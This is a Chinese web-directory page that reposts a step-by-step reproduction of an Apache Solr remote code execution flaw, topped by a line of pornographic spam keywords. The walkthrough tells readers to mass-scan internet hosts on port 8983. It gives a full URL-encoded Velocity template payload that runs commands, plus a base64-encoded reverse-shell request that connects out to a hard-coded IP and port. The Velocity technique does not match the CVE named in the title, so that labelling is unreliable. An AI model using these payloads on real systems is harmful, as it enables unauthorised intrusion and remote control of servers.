日日操夜夜添-日日操影院-日日草夜夜操-日日干干-精品一区二区三区波多野结衣-精品一区二区三区高清免费不卡

公告:魔扣目錄網為廣大站長提供免費收錄網站服務,提交前請做好本站友鏈:【 網站目錄:http://www.ylptlb.cn 】, 免友鏈快審服務(50元/站),

點擊這里在線咨詢客服
新站提交
  • 網站:51998
  • 待審:31
  • 小程序:12
  • 文章:1030137
  • 會員:747

一.漏洞描述

近日,Apache官方發布Apache Solr遠程代碼執行漏洞(CVE-2019-0193)安全通告,此漏洞存在于可選模塊DataImportHandler 中,DataImportHandler是用于從數據庫或其他源提取數據的常用模塊,該模塊中所有DIH配置都可以通過外部請求的dataConfig參 數來設置,由于DIH配置可以包含腳本,因此該參數存在安全隱患。攻擊者可利用dataConfig參數構造惡意請求,實現遠程代碼執行,請相關用戶盡快升級Solr至安全版本,以確保對此漏洞的有效防護。

二.復現操作

1.批量搜一下開了8983端口的主機

Apache Solr遠程代碼執行漏洞 (CVE-2019-0193)復現操作

 

2.訪問目標主機,找到漏洞的位置,點到 core selector那個按鈕,burp抓包攔截

Apache Solr遠程代碼執行漏洞 (CVE-2019-0193)復現操作

 


Apache Solr遠程代碼執行漏洞 (CVE-2019-0193)復現操作

 

3.發送到repeater,把上圖請求的admin 改為item(這里注意對應的模塊),后面再加config 查看是否有其配置文件,如果沒有配置文件,,則說明可能目標不存在這種漏洞,這也是一種檢測方式?

Apache Solr遠程代碼執行漏洞 (CVE-2019-0193)復現操作

 

4.因為該漏洞所影響的模塊可以利用外部的請求來修改,所以利用惡意的請求payload去修改配置,修改了配置過后,就導致可以執行惡意的腳本,從而發起帶有惡意代碼的請求。

Apache Solr遠程代碼執行漏洞 (CVE-2019-0193)復現操作

 

5.修改了配置過后,便可以帶上惡意腳本的請求去發起訪問了,從而導致了遠程代碼執行,請求路徑內容如下圖payload:select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27JAVA.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27pwd%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end?

Apache Solr遠程代碼執行漏洞 (CVE-2019-0193)復現操作

 

6.遠程代碼執行成功

7.反彈shell payload:

linux 反彈shell命令 bash -i >& /dev/tcp/ip/port 0>&1 (至于payload中為什么要base64編碼不太清楚...)

http://ip 8983/solr/item/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27bash+-c+%7Becho%2CYmFzaCAtaSA%2BJiAvZGV2L3RjcC8xMS4yMDMuMi4yMTgvMTIzNCAwPiYx%7D%7C%7Bbase64%2C-d%7D%7C%7Bbash%2C-i%7D%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end

三.漏洞特征

端口:8983,http

路徑:/solr/item/config

四.影響范圍

受影響版本 :

Apache Solr < 8.2.0

分享到:
標簽:漏洞 執行
用戶無頭像

網友整理

注冊時間:

網站:5 個   小程序:0 個  文章:12 篇

  • 51998

    網站

  • 12

    小程序

  • 1030137

    文章

  • 747

    會員

趕快注冊賬號,推廣您的網站吧!
最新入駐小程序

數獨大挑戰2018-06-03

數獨一種數學游戲,玩家需要根據9

答題星2018-06-03

您可以通過答題星輕松地創建試卷

全階人生考試2018-06-03

各種考試題,題庫,初中,高中,大學四六

運動步數有氧達人2018-06-03

記錄運動步數,積累氧氣值。還可偷

每日養生app2018-06-03

每日養生,天天健康

體育訓練成績評定2018-06-03

通用課目體育訓練成績評定